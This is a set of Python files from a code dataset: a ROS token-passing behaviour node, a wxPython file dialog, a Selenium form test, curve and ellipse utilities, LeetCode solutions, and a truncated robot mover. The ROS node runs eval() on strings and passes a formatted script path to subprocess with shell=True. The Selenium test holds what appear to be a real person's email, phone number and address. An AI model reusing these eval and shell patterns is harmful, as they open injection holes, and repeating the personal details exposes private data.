prio\n\n def set_executable(self, file):\n \"\"\" Sets executable script \n \n Args:\n file (string): file's name, that will be executed\n \"\"\"\n self._script = file\n\n return True\n\n def subscribe_to_topics(self):\n \"\"\" Subscribes to all ROS topics \"\"\"\n\n rospy.Subscriber(self.TOKEN_REQUEST_TOPIC, Int32, self.request_token_cb)\n rospy.Subscriber(self.TOKEN_RELEASE_TOPIC, Int32, self.release_token_cb)\n\n rospy.Subscriber(self.TOKEN_ASK_TOPIC, Int32, self.ask_token_cb)\n rospy.Subscriber(self.TOKEN_ANSWER_TOPIC, Answer, self.answer_token_cb)\n\n rospy.Subscriber(Constants.VAR_SET_TOPIC, Variable, self.set_variable_cb)\n rospy.Subscriber(Constants.VAR_GET_TOPIC, String, self.get_variable_cb)\n \n\n def set_active(self, active_str):\n \"\"\" Sets string that is later evaluated to boolean value which shows whether the node should be active\n\n Args:\n active_str (string): string that will be evaluated\n \"\"\"\n\n if active_str != \"\":\n self._active_str = active_str\n\n def is_active(self):\n \"\"\" Return boolean value which shows whether the node is active or not \"\"\"\n\n active = eval(self._active_str)\n\n self.write_debug(\"Activate string \" + self._active_str + \" evaluates to \" + str(active), 3)\n\n return active\n\n def request_token(self):\n \"\"\" Sends out token request message \"\"\"\n\n self.request_pub.publish(self._priority)\n\n self.write_debug(\"Requesting token\", 2)\n\n def release_token(self, rel_prio):\n \"\"\" Releases held token\n\n If necessary pauses the current state machine\n\n Args:\n rel_prio (int): indicates to which priority the token is released\n \"\"\"\n\n if self.is_active():\n self.pause_behaviour()\n\n self._token = False\n self.release_pub.publish(rel_prio)\n\n self.write_debug(\"Releasing token to priority \" + str(rel_prio), 2)\n\n def ask_token(self):\n \"\"\"Asks for token on startup\n This is different from token request because token is asked on startup and nobody has token at startup.\n On startup token is given to node which has the highest priority.\n If some node asks for token when somebody already has token, false is returned despite its priority.\n\n Returns:\n bool: True if node is allowed to ask token 
again, False otherwise\n \"\"\"\n\n if self._token_ask_times > self.MAX_TOKEN_ASK_TIMES:\n return False\n\n if self._token_ask_times == self.MAX_TOKEN_ASK_TIMES:\n if self._answer_false_gotten:\n self._token = False\n self.write_debug(\"Got False at least once when asking for token\", 2)\n else:\n self._token = self._answer\n self.write_debug(\"Got answer \" + str(self._answer) + \" when asking token on startup\", 2)\n\n self._token_ask_times += 1\n\n return False\n\n if not self._answer_false_gotten:\n self.ask_pub.publish(self._priority)\n\n self._token_ask_times += 1\n\n self.write_debug(\"Asking token on startup (\" + str(self._token_ask_times) + \"/\" + str(self.MAX_TOKEN_ASK_TIMES) + \")\", 3)\n\n return True\n\n def answer_token_cb(self, data):\n \"\"\" Deals with incoming token answer message\n\n If node has been given False as an answer even once, it has no chance to acquire token on startup\n\n Args:\n data (mission_control.msg.Answer): data.priority is the priority of the node this answer is meant for,\n data.answer is the answer given to the node\n \"\"\"\n\n if self._priority == data.priority and not self._answer_false_gotten:\n self._answer = data.answer\n\n if not self._answer:\n self._answer_false_gotten = True\n\n def ask_token_cb(self, data):\n \"\"\"Deals with incoming token ask message\n\n If the asking node's priority is higher than or equal to that of the node being asked, permission to acquire the token is given.\n If the asking node's priority is lower, permission to acquire the token is denied\n\n If the node being asked owns the token itself, permission to acquire the token is denied\n \"\"\"\n\n if data.data == self._priority:\n return\n\n msg = Answer()\n msg.priority = data.data\n\n if self._token or self._priority < data.data:\n msg.answer = False\n else: \n msg.answer = True\n\n self.write_debug(\"Priority \" + str(data.data) + \" asked for token, got answer \" + str(msg.answer), 3)\n\n self.answer_pub.publish(msg)\n\n def request_token_cb(self, data):\n \"\"\" Deals with incoming token request message\n\n Args:\n data (std_msgs.msg.Int32): priority number of the node who requested token\n \"\"\"\n \n if self._token and (data.data < self._priority or not self.is_active()):\n self.release_token(data.data)\n\n def release_token_cb(self, data):\n \"\"\" Deals with incoming token release message.\n\n If necessary claims token and resumes current state machine.\n\n Args:\n data (std_msgs.msg.Int32): priority number of the node to whom token was released\n \"\"\"\n \n if data.data != self._priority:\n return\n \n self._token = True\n self.write_debug(\"Got token\", 1)\n \n if self._paused:\n self.resume_behaviour()\n\n def pause_behaviour(self):\n \"\"\" Pauses the current subprocess \"\"\"\n\n os.kill(self._process.pid, signal.SIGSTOP)\n self._paused = True\n\n self.write_debug(\"Pausing node\", 1)\n\n def resume_behaviour(self):\n \"\"\" Resumes the current subprocess \"\"\"\n\n os.kill(self._process.pid, signal.SIGCONT)\n self._paused = False\n\n self.write_debug(\"Resuming node\", 1)\n\n def set_variable_cb(self, data):\n \"\"\" Deals with incoming set variable msg\n\n If variable exists in cache then the value is updated otherwise it's ignored\n\n Args:\n data (mission_control.msg.Variable): data.name is the variable's name, data.value is the variable's value, data.ttl is variable's validity\n \"\"\"\n\n var_from_own_proc = data.node_name == rospy.get_name()\n\n if var_from_own_proc:\n self._vars_from_own_proc[data.name] = data.value\n\n self.write_debug(\"Setting 
variable named \" + data.name + \" with value \" + str(data.value) + \" as own variable\", 2)\n\n if data.name in self._cache or (\"_\" + data.name) in self._cache or var_from_own_proc:\n self._cache[data.name] = data.value\n self._var_last_upt[data.name] = rospy.Time.now()\n\n self.write_debug(\"Setting variable named \" + data.name + \" with value \" + str(data.value), 2)\n\n if data.ttl > 0:\n self._var_ttl[data.name] = rospy.Duration.from_sec(data.ttl)\n self.write_debug(\"Setting variable named \" + data.name + \" with time to live \" + str(data.ttl), 3)\n\n def get_variable_cb(self, data):\n \"\"\" Deals with get variable msg\n\n If child process isn't running then node tries to search for the variable\n in child python script.\n\n Otherwise looks, if the requested variable has been set by the child process.\n\n If variable is found by either of these methods, then the variable is set\n using mission_control_utils' function set_var\n\n Args:\n data (std_msgs.msg.String): variable name that is being searched\n \"\"\"\n\n self.check_var(data.data)\n\n if os.path.isfile(self._script) and self.node_not_running():\n found, var = self.find_var(data.data)\n\n if found:\n mission_control_utils.set_var(data.data, var)\n return\n\n elif data.data in self._vars_from_own_proc:\n ttl = None\n\n if data.data in self._var_ttl:\n ttl = self._var_ttl[data.data].to_sec()\n\n mission_control_utils.set_var(data.data, self._vars_from_own_proc[data.data], ttl)\n\n def find_var(self, var_name):\n \"\"\" Tries to find the requested variable from child python file\n that is stored in seld._script variable\n\n Args:\n var_name (string): variable name that is being searched\n\n Returns:\n bool: True if variable was found, False otherwise\n mixed: None, if the variable wasn't found, otherwise variable's value\n \"\"\"\n\n found = False\n variable = None\n self.explored = []\n self.types = [smach.StateMachine]\n\n try:\n state_machine = imp.load_source(str(uuid.uuid1()), self._script)\n except:\n return found, variable\n\n for var in dir(state_machine):\n obj = eval('state_machine.' + var)\n\n if isinstance(obj, type) and obj not in self.types:\n self.types.append(obj)\n\n for var in dir(state_machine):\n obj = eval('state_machine.' + var)\n\n if isinstance(obj, tuple(self.types)):\n found, variable = self.explore_obj(obj, var_name)\n\n if found:\n return found, variable\n\n return found, variable\n\n def explore_obj(self, obj, var_name, cnt=0):\n \"\"\" Explores all objects variables for the requested variable\n\n Args:\n obj (mixed): some user defined class or smach.Statemachine class\n var_name (string): variable name that is being searched\n cnt (int): how deep the recursion is\n\n Returns:\n bool: True if variable was found, False otherwise\n mixed: None, if the variable wasn't found, otherwise variable's value\n \"\"\"\n\n if obj in self.explored or cnt > self.MAX_VAR_SEARCH_RECURSION:\n return False, None\n\n found = False\n found_var = None\n\n self.explored.append(type(obj))\n\n for var in dir(obj):\n var_obj = eval('obj.' 
+ var)\n var_type = type(var_obj)\n\n if var == var_name and var_type in (bool, str, int, long, float):\n return True, var_obj\n\n if var_type is dict:\n found, found_var = self.explore_dict(var_obj, var_name, cnt+1)\n\n if var_type in (list, tuple):\n found, found_var = self.explore_list(var_obj, var_name, cnt+1)\n\n if isinstance(var_obj, tuple(self.types)):\n found, found_var = self.explore_obj(var_obj, var_name, cnt+1)\n\n if found:\n return found, found_var\n\n return found, found_var\n\n def explore_dict(self, dct, var_name, cnt):\n \"\"\" Searches dictionary for any objects that could be further explored\n\n Args:\n dct (dict): dictionary to be searched\n var_name (string): variable name that is being searched\n cnt (int): how deep the recursion is\n\n Returns:\n bool: True if variable was found, False otherwise\n mixed: None, if the variable wasn't found, otherwise variable's value\n \"\"\"\n\n found = False\n found_var = None\n\n if cnt > self.MAX_VAR_SEARCH_RECURSION:\n return found, found_var\n\n for key in dct:\n obj = dct[key]\n if isinstance(obj, tuple(self.types)):\n found, found_var = self.explore_obj(obj, var_name, cnt+1)\n\n if found:\n return found, found_var\n\n return found, found_var\n\n def explore_list(self, lst, var_name, cnt):\n \"\"\" Searches list for any objects that could be further explored\n\n Args:\n lst (list): list to be searched\n var_name (string): variable name that is being searched\n cnt (int): how deep the recursion is\n\n Returns:\n bool: True if variable was found, False otherwise\n mixed: None, if the variable wasn't found, otherwise variable's value\n \"\"\"\n\n found = False\n found_var = None\n\n if cnt > self.MAX_VAR_SEARCH_RECURSION:\n return found, found_var\n\n for i in range(0, len(lst)):\n obj = lst[i]\n if isinstance(obj, tuple(self.types)):\n found, found_var = self.explore_obj(obj, var_name, cnt+1)\n\n if found:\n return found, found_var\n\n return found, found_var\n\n def get_var(self, name, def_val=None, counter=0):\n \"\"\" Request given variable's value\n\n First: checks cache, if variable exists there\n Second: if variable is not in cache then searches for it in child python file if the process isn't running\n Third: lastly, if variable is not in node's statemachine, requests variable from all initialized nodes\n\n Args:\n name (string): requested variable's name\n\n Returns:\n mixed: requested variable's value\n \"\"\"\n\n if counter == 0:\n self.check_var(name)\n\n if name in self._cache:\n self.write_debug(\"Found variable named \" + name + \" in cache\", 2)\n return self._cache[name]\n\n if os.path.isfile(self._script) and self.node_not_running():\n found, var = self.find_var(name)\n\n if found:\n self._cache[name] = var\n return var\n\n if counter == 0:\n self._cache[\"_\"+name] = True\n mission_control_utils.publish_get_var(name)\n\n if counter > Constants.MAX_CBS:\n self.write_debug(\"Maximum callbacks for get_var function reached, setting variable named \" + name + \" with default value \" + str(def_val), 2)\n\n self._cache[name] = def_val\n return def_val\n\n counter += 1\n\n self.write_debug(\"Asking for variable named \" + name + \" (\" + str(counter) + \"/\" + str(Constants.MAX_CBS) + \")\", 3)\n\n time.sleep(Constants.VAR_RECHECK_DELAY)\n\n return self.get_var(name, def_val, counter)\n\n\n def check_var(self, name):\n \"\"\"Checks if the variable in cache is new enough or needs to be deleted\n\n Args:\n name (string): variable's name\n \"\"\"\n \n if name not in self._var_ttl or name not in self._var_last_upt:\n return\n\n 
var_ttl = self._var_ttl[name]\n var_last_upt = self._var_last_upt[name]\n\n if rospy.Time.now() > (var_last_upt + var_ttl):\n self.write_debug(\"Deleting variable named \" + name + \" from cache\", 1)\n\n if name in self._cache:\n del self._cache[name]\n self.write_debug(\"Deleting variable named \" + name + \" from self._cache\", 3)\n\n if \"_\"+name in self._cache:\n del self._cache[\"_\" + name]\n self.write_debug(\"Deleting variable named _\" + name + \" from self._cache\", 3)\n\n if name in self._vars_from_own_proc:\n del self._vars_from_own_proc[name]\n self.write_debug(\"Deleting variable named \" + name + \" from self._vars_from_own_proc\", 3)\n\n if name in self._var_ttl:\n del self._var_ttl[name]\n self.write_debug(\"Deleting time to live for variable named \" + name + \" from self._var_ttl\", 3)\n\n if name in self._var_last_upt:\n del self._var_last_upt[name]\n self.write_debug(\"Deleting last update time for variable named \" + name + \" from self._var_last_upt\", 3)\n\n def activate(self):\n \"\"\" Activates node \"\"\"\n\n if(os.path.isfile(self._script)):\n cmd = \"exec python %s %d %s\"\n else:\n cmd = \"exec rosrun %s %d %s\"\n\n cmd = cmd % (self._script, self._debug_level, rospy.get_name())\n\n self._process = subprocess.Popen(cmd,shell=True)\n self._running = True\n\n self.write_debug(\"Node activates\", 1)\n\n def deactivate(self):\n \"\"\" Deactivates node \"\"\"\n\n self._running = False\n self._process = False\n\n self.write_debug(\"Node deactivates\", 1)\n\n def node_not_running(self):\n\n return not self._running and not self._process\n\n def kill_process(self):\n \"\"\" Kills the active process \"\"\"\n\n if self._process:\n self._process.kill()\n\n def is_subprocess_alive(self):\n \"\"\" Checks if the subprocess, in which the script runs, is alive \n\n Returns:\n bool: True if subprocess is alive, False otherwise\n \"\"\"\n\n if not self._process:\n return False\n\n self._process.poll()\n alive = self._process.returncode is None\n\n self.write_debug(\"Subprocess alive: \" + str(alive), 3)\n\n return alive\n\n def node_is_ok(self):\n \"\"\" Publishes message that shows that node is alive \"\"\"\n\n msg = Health()\n msg.node_name = rospy.get_name()\n msg.token = self._token\n\n self.ok_pub.publish(msg)\n\n self.write_debug(\"Publishing node is ok message\", 3)\n \n\n def spin(self):\n \"\"\" Checks if the node is active\n\n If the node is active and not running, activates node\n If the subprocess ends, deactivates node\n\n On every call sends a message that shows that the node is alive\n\n On startup asks for token as many times as it is defined in variable self.MAX_TOKEN_ASK_TIMES\n \"\"\"\n\n self.node_is_ok()\n\n allowed_to_ask_token = self.ask_token()\n\n self.write_debug(\"I have token: \" + str(self._token), 3)\n\n if allowed_to_ask_token:\n self.write_debug(\"Node is still asking for token on startup\", 2)\n return\n\n active = self.is_active()\n\n if active and not self._token:\n self.request_token()\n\n if active and self._token and not self._running:\n self.activate()\n elif self._token and self._running and not self.is_subprocess_alive():\n self.deactivate()\n\n def write_debug(self, msg, level):\n \"\"\" Writes node's debug message\n\n Args:\n msg (string): debug message to be printed\n level (int): debug message's level\n \"\"\"\n\n if self._debug_level >= level:\n rospy.loginfo(rospy.get_name() + \" - \" + 
msg)\n","sub_path":"src/behaviour.py","file_name":"behaviour.py","file_ext":"py","file_size_in_byte":22486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"394574412","text":"# Exercise in using FileDialog.\n\nimport wx, os\n\nclass MyApp(wx.App):\n def OnInit(self):\n self.frame = MyFrame(None, title=\"FileDialog Exercise\")\n self.frame.Show()\n return True\n\nclass MyFrame(wx.Frame):\n def __init__(self, *args, **kwargs):\n super(MyFrame, self).__init__(*args, **kwargs)\n\n # Attributes\n self.file = None\n style = wx.TE_MULTILINE|wx.TE_RICH2\n self.txtctrl = wx.TextCtrl(self, style=style)\n\n # Setup\n self._SetupMenus()\n\n # Layout\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.txtctrl, 1, wx.EXPAND)\n self.SetSizer(sizer)\n\n # Event Handlers\n self.Bind(wx.EVT_MENU, self.OnOpen, id=wx.ID_OPEN)\n self.Bind(wx.EVT_MENU, self.OnSaveAs, id=wx.ID_SAVEAS)\n self.Bind(wx.EVT_MENU, self.OnExit, id=wx.ID_EXIT)\n self.Bind(wx.EVT_CLOSE, self.OnExit)\n\n def _SetupMenus(self):\n \"\"\"Make the frames menus\"\"\"\n menub = wx.MenuBar()\n fmenu = wx.Menu()\n fmenu.Append(wx.ID_OPEN, \"Open\\tCtrl+O\")\n fmenu.AppendSeparator()\n fmenu.Append(wx.ID_SAVEAS, \"Save As\\tShift+Ctrl+S\")\n fmenu.AppendSeparator()\n fmenu.Append(wx.ID_EXIT, \"Exit\\tCtrl+Q\")\n menub.Append(fmenu, \"File\")\n self.SetMenuBar(menub)\n\n #---- Event Handlers ----#\n\n def OnOpen(self, event):\n \"\"\"Handle Open\"\"\"\n if event.GetId() == wx.ID_OPEN:\n self.DoOpen()\n else:\n event.Skip()\n\n def OnSaveAs(self, event):\n \"\"\"Handle SaveAs\"\"\"\n if event.GetId() == wx.ID_SAVEAS:\n self.DoSaveAs()\n else:\n event.Skip()\n\n def OnExit(self, event):\n \"\"\"Handle window close event\"\"\"\n self.Destroy()\n\n #---- End Event Handlers ----#\n\n #---- Implementation ----#\n\n def DoOpen(self):\n \"\"\"Show file open dialog\"\"\"\n dlg = wx.FileDialog(self,\n message=\"Open a File\",\n style=wx.FD_OPEN, \n defaultDir=os.getcwd())\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPath()\n self.SetTitle(\"Open \" + path)\n else:\n self.SetTitle(\"Open Dialog Canceled\")\n dlg.Destroy()\n\n def DoSaveAs(self):\n \"\"\"Show SaveAs dialog\"\"\"\n dlg = wx.FileDialog(self,\n message=\"Save As\",\n style=wx.FD_SAVE, \n defaultDir=os.getcwd())\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPath()\n self.SetTitle(\"Save as \" + path)\n else:\n self.SetTitle(\"Save As Dialog Canceled\")\n dlg.Destroy()\n \n #---- End Implementation ----#\n\n#---- Main Execution ----#\n\nif __name__ == \"__main__\":\n app = MyApp(False)\n app.MainLoop()\n","sub_path":"wxpython/widgets/filedialogs/target_ui.py","file_name":"target_ui.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"475466606","text":"import os\nfrom common.webdriver_factory import create_driver_instance, ROOT_DIR\nfrom pages.demoqa.practice_form import PracticeForm\ntry:\n driver = create_driver_instance('chrome')\n driver.get('chrome://settings/')\n driver.execute_script('chrome.settingsPrivate.setDefaultZoom(0.75);')\n page = PracticeForm(driver,20)\n page.abrir_pagina_web()\n page.esperar_hasta_que_se_cargue_elemento()\n page.set_first_name('Sandra')\n page.set_last_name('Gutierrez')\n page.set_email('ferny.gutierrez@gmail.com')\n page.set_gender('Female')\n page.set_mobile('3003656382')\n page.set_hobbies('Sports')\n page.set_subjects('Maths')\n page.set_subjects('Computer Science')\n page.set_current_address('CRA 
17 # 136 - 73')\n page.set_date_of_birth(\"Nov 30 2020\")\n file_path = os.path.join(ROOT_DIR, '.gitignore')\n page.set_file(file_path)\n page.set_state('NCR')\n page.set_city('Delhi')\n\nfinally:\n driver.cerrar_navegador()","sub_path":"pages/test_practice_from.py","file_name":"test_practice_from.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"148843696","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 1 12:23:36 2019\n\n@author: C176616\n\"\"\"\nfrom scipy.interpolate import interp1d\nimport numpy as np\n\nclass Curve():\n '''\n A class that represents a single servopress curve\n \n Attributes\n ----------\n x : array of floats\n individual x points that make up the curve\n y : array of floats\n individual y points that make up the curve\n runID : string\n unique ID for this curve\n \n '''\n def __init__(self):\n self.x = []\n self.y = []\n self.runID = \"\"\n \n def interpolate(self, resolution):\n ''' Interpolates X and Y data to new values\n \n Parameters\n ----------\n resolution : float\n the resolution interpolated to\n \n '''\n xValues = self.x\n yValues = self.y\n interp = interp1d(xValues, yValues, kind='linear', fill_value=\"extrapolate\")\n xNew = np.arange(xValues[0], xValues[len(xValues)-1], resolution)\n yNew = interp(xNew)\n self.x = xNew\n self.y = yNew\n \n def calculateYCrossover(self, leftBound, rightBound, target, upDown):\n ''' finds the X and Y value where the curve crosses a target Y value\n \n Parameters\n ----------\n leftBound : float\n X position where to start search\n rightBound : float\n X position where to stop search\n target : float\n the target Y value to search for\n upDown : string\n either \"up\" or \"down\". Determines which direction the intercept \n should occur\n \n Returns\n -------\n result : int\n either 0 or 1. 0 if no intercept was found, 1 if one was found\n xCoord : float\n the X coordinate closest to the target value\n yCoord : float\n the Y coordinate closest to the target value\n \n '''\n\n result = 0\n xCoord = []\n yCoord = []\n # enumerate through all x coordinates\n for index, xPoint in enumerate(self.x):\n # if within the bounded search region\n if xPoint >= leftBound and xPoint <= rightBound:\n # search bottom to top\n if upDown == \"up\":\n if self.y[index] >= target and self.y[index-1] < target:\n xCoord = xPoint\n yCoord = self.y[index]\n result = 1\n # search top to bottom\n elif upDown == \"down\":\n if self.y[index] <= target and self.y[index-1] > target:\n xCoord = xPoint\n yCoord = self.y[index]\n result = 1 \n return result, xCoord, yCoord\n \n def calculateXCrossover(self, lowerBound, upperBound, target, leftRight):\n ''' finds the X and Y value where the curve crosses a target X value\n \n Parameters\n ----------\n lowerBound : float\n Y position where to start search\n upperBound : float\n Y position where to stop search\n target : float\n the target X value to search for\n leftRight : string\n either \"left\" or \"right\". Determines which direction the intercept \n should occur\n \n Returns\n -------\n result : int\n either 0 or 1. 
0 if no intercept was found, 1 if one was found\n xCoord : float\n the X coordinate closest to the target value\n yCoord : float\n the Y coordinate closest to the target value\n '''\n \n result = 0\n xCoord = []\n yCoord = []\n # enumerate through all y coordinates\n for index, yPoint in enumerate(self.y):\n # if within the bounded search region\n if yPoint >= lowerBound and yPoint <= upperBound:\n # search left to right\n if leftRight == \"left\":\n if self.x[index] >= target and self.x[index-1] < target:\n yCoord = yPoint\n xCoord = self.x[index]\n result = 1\n # search right to left\n elif leftRight == \"right\":\n if self.x[index] <= target and self.x[index-1] > target:\n yCoord = yPoint\n xCoord = self.x[index]\n result = 1 \n return result, xCoord, yCoord\n \n def getFinalPosition(self):\n '''\n returns the final point of the curve\n \n Returns\n -------\n [x,y] : array\n array of final x point and final y point\n '''\n return [self.x[len(self.x)-1], self.y[len(self.y)-1]]\n ","sub_path":"RSC/Curve.py","file_name":"Curve.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"11646965","text":"#!/bin/python3\n\nimport time\nimport math\nimport cv2\n\n\nclass ElipseDraw:\n\n def draw_elipse(self, image_dir):\n\n # Timer\n start_time = time.time()\n\n img = cv2.imread(image_dir)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n blur = cv2.GaussianBlur(gray, (5, 5), 1, 1, 0)\n # blur = cv2.blur(gray, (5, 5))\n\n _, thresh = cv2.threshold(blur, 50, 255, cv2.THRESH_BINARY)\n # _, thresh = cv2.threshold(blur, 127, 255, cv2.ADAPTIVE_THRESH_MEAN_C)\n\n contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n for cnt in contours:\n try:\n (x, y), (MA, ma), angle = cv2.fitEllipse(cnt)\n except:\n print(image_dir)\n return []\n\n # cv2.ellipse(img, ((x, y), (MA, ma), angle), (0,0,255), 2, cv2.LINE_AA)\n\n end_time = time.time()\n total_time = end_time - start_time\n\n data = [x, y, ma/2, MA/2, angle, total_time]\n end_data = ['%.2f' % elem for elem in data]\n\n # cv2.imwrite(image_dir, img)\n return end_data\n","sub_path":"src/elipse_draw.py","file_name":"elipse_draw.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"620758820","text":"import collections\n\n\nclass Solution:\n def maxAreaOfIsland(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n if grid is None or len(grid) == 0 or len(grid[0]) == 0:\n return 0\n res = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n res = max(res, self.bfs(grid, i, j))\n return res\n\n def bfs(self, grid, i, j):\n res = 0\n dx, dy = [1, 0, 0, -1], [0, 1, -1, 0]\n q = collections.deque([(i, j)])\n grid[i][j] = 2\n while q:\n grid_x, grid_y = q.popleft()\n res += 1\n for k in range(4):\n x, y = grid_x + dx[k], grid_y + dy[k]\n if x < 0 or x >= len(grid) or y < 0 or y >= len(grid[0]):\n continue\n if grid[x][y] == 1:\n grid[x][y] = 2\n q.append((x, y))\n return res\n\n\nclass Solution:\n def maxAreaOfIsland(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n if grid is None or len(grid) == 0 or len(grid[0]) == 0:\n return 0\n res = 0\n visited = set()\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n res = max(res, self.dfs(grid, i, j, visited))\n return res\n\n def dfs(self, grid, i, j, visited):\n dx, dy = [1, 0, 0, -1], [0, 1, -1, 0]\n if not 
(0 <= i < len(grid) and 0 <= j < len(grid[0]) and (i, j) not in visited and grid[i][j]):\n return 0\n visited.add((i, j))\n res = 1\n for k in range(4):\n x, y = i + dx[k], j + dy[k]\n res += self.dfs(grid, x, y, visited)\n return res\n","sub_path":"python/695. Max Area of Island.py","file_name":"695. Max Area of Island.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"178344831","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom tf.transformations import euler_from_quaternion\n\nclass RBKairosMover(object):\n\n def __init__(self, real_robot=False):\n\n if not real_robot:\n self._cmd_vel_topic_name = \"/robot/robotnik_base_control/cmd_vel\"\n self._odometry_topic_name = \"/robot/robotnik_base_control/odom\"\n else:\n self._cmd_vel_topic_name = \"/robot/robotnik_base_control/cmd_vel\"\n self._odometry_topic_name = \"/robot/robotnik_base_control/odom\"\n\n self._movement_class = Twist()\n self._movement_class_stop = Twist()\n self._cmd_vel_pub = rospy.Publisher(self._cmd_vel_topic_name, Twist, queue_size=1)\n\n self._check_cmd_vel_pub()\n\n\n # Odometry subscriber\n self._odom_pose = self._check_odom_ready()\n rospy.Subscriber(self._odometry_topic_name, Odometry, self._odom_callback)\n\n def _check_cmd_vel_pub(self):\n \"\"\"\n Checks that the cmd_vel publisher is available.\n This is vital to be sure that when you publish inside this topic, its reieved.\n :return:\n \"\"\"\n rate = rospy.Rate(10) # 10hz\n while self._cmd_vel_pub.get_num_connections() == 0 and not rospy.is_shutdown():\n rospy.logdebug(\"No susbribers to \"+self._cmd_vel_topic_name+\" yet so we wait and try again\")\n try:\n rate.sleep()\n except rospy.ROSInterruptException:\n # This is to avoid error when world is reseted, time when backwards.\n pass\n rospy.logdebug(self._cmd_vel_topic_name+\" Publisher Ready\")\n\n\n def _check_odom_ready(self):\n odom_value = None\n rospy.logdebug(\"Waiting for \"+self._odometry_topic_name+\" to be READY...\")\n while odom_value is None and not rospy.is_shutdown():\n try:\n odom_value = rospy.wait_for_message(self._odometry_topic_name, Odometry, timeout=0.5)\n rospy.logdebug(\"Current \"+self._odometry_topic_name+\" READY=>\")\n\n except:\n rospy.logerr(\"Current \"+self._odometry_topic_name+\" not ready yet, retrying for getting odom\")\n\n return odom_value.pose.pose\n\n\n def _odom_callback(self, data):\n self._odom_pose = data.pose.pose\n\n def get_x_y_yaw(self, odom_pose):\n \"\"\"\n It gets for us the x, y and yaw form a pose message\n \"\"\"\n x_value = self._odom_pose.position.x\n y_value = self._odom_pose.position.y\n\n orientation_list = [self._odom_pose.orientation.x, self._odom_pose.orientation.y, self._odom_pose.orientation.z, self._odom_pose.orientation.w]\n (roll, pitch, yaw) = euler_from_quaternion (orientation_list)\n\n return x_value, y_value, yaw\n\n\n def check_movement(self, delta_x = None, delta_y = None, delta_angular = None, movement_object= None):\n \"\"\"\n Check that the x,y an dangular values have changes from first call the delta given\n When None this value wont be considered\n delta_x = None\n delta_y = None\n delta_angular = None\n \"\"\"\n x0_value, y0_value, yaw0 = self.get_x_y_yaw(self._odom_pose)\n movement_achieved = False\n rate = rospy.Rate(10) # 10hz\n\n while not movement_achieved and not rospy.is_shutdown():\n rospy.logerr(\"Movement NOT 
ACHIEVED\")\n\n x1_value, y1_value, yaw1 = self.get_x_y_yaw(self._odom_pose)\n\n if delta_x:\n xdelta_value = x1_value - x0_value\n rospy.loginfo(\"xdelta_value=\"+str(xdelta_value))\n if delta_x >= 0:\n # Positive value\n delta_x_ok = (xdelta_value >= delta_x)\n else:\n # Negative Value\n delta_x_ok = (xdelta_value <= delta_x)\n else:\n delta_x_ok = True\n\n if delta_y:\n ydelta_value = y1_value - y0_value\n rospy.loginfo(\"ydelta_value=\"+str(ydelta_value))\n if delta_y >= 0:\n # Positive value\n delta_y_ok = (ydelta_value >= delta_y)\n else:\n # Negative Value\n delta_y_ok = (ydelta_value <= delta_y)\n else:\n delta_y_ok = True\n\n\n if delta_angular:\n yaw_delta_value = yaw1 - yaw0\n rospy.loginfo(\"yaw_delta_value=\"+str(yaw_delta_value))\n if delta_angular >= 0:\n # Positive value\n delta_angular_ok = (yaw_delta_value >= delta_angular)\n else:\n # Negative Value\n delta_angular_ok = (yaw_delta_value < delta_angular)\n else:\n delta_angular_ok = True\n\n # We check if movement achieved\n movement_achieved = delta_x_ok and delta_y_ok and delta_angular_ok\n\n try:\n self._cmd_vel_pub.publish(movement_object)\n rate.sleep()\n except rospy.ROSInterruptException:\n # This is to avoid error when world is reseted, time when backwards.\n pass\n\n if movement_achieved:\n rospy.loginfo(\"Movement Achived, Stopping\")\n self._cmd_vel_pub.publish(self._movement_class_stop)\n else:\n rospy.logerr(\"Movement NOT ACHIEVED\")\n \n\n return movement_achieved\n\n\n\n def move_in_square_omni(self):\n \"\"\"\n Move RB-Kairos in a square\n \"\"\"\n\n def move_rbkairos(self,dir, distance, l_speed=0.2, a_speed=0.5):\n\n lin_x = 0.0\n delta_x_distance = None\n lin_y = 0.0\n delta_y_distance = None\n ang_z = 0.0\n delta_angular_distance = None\n\n if dir == \"forwards\":\n lin_x = l_speed\n delta_x_distance = distance\n elif dir == \"backwards\":\n lin_x = -1*l_speed\n delta_x_distance = -1*distance\n elif dir == \"left\":\n lin_y = l_speed\n delta_y_distance = distance\n elif dir == \"right\":\n lin_y = -1*l_speed\n delta_y_distance = -1*distance\n elif dir == \"turn_right\":\n ang_z = a_speed\n delta_angular_distance = distance\n elif dir == \"turn_left\":\n ang_z = -1*a_speed\n delta_angular_distance = -1*distance\n else:\n rospy.logerr(\"Movement not supported\")\n\n\n self._movement_class.linear.x = lin_x\n self._movement_class.linear.y = lin_y\n self._movement_class.angular.x = ang_z\n\n \n self.check_movement(delta_x = delta_x_distance,\n delta_y = delta_y_distance,\n delta_angular = delta_angular_distance,\n movement_object = self._movement_class)\n \n\n\n\ndef odometry_check_test():\n rospy.init_node('talker', anonymous=True)\n rbkairos_movement = RBKairosMover()\n 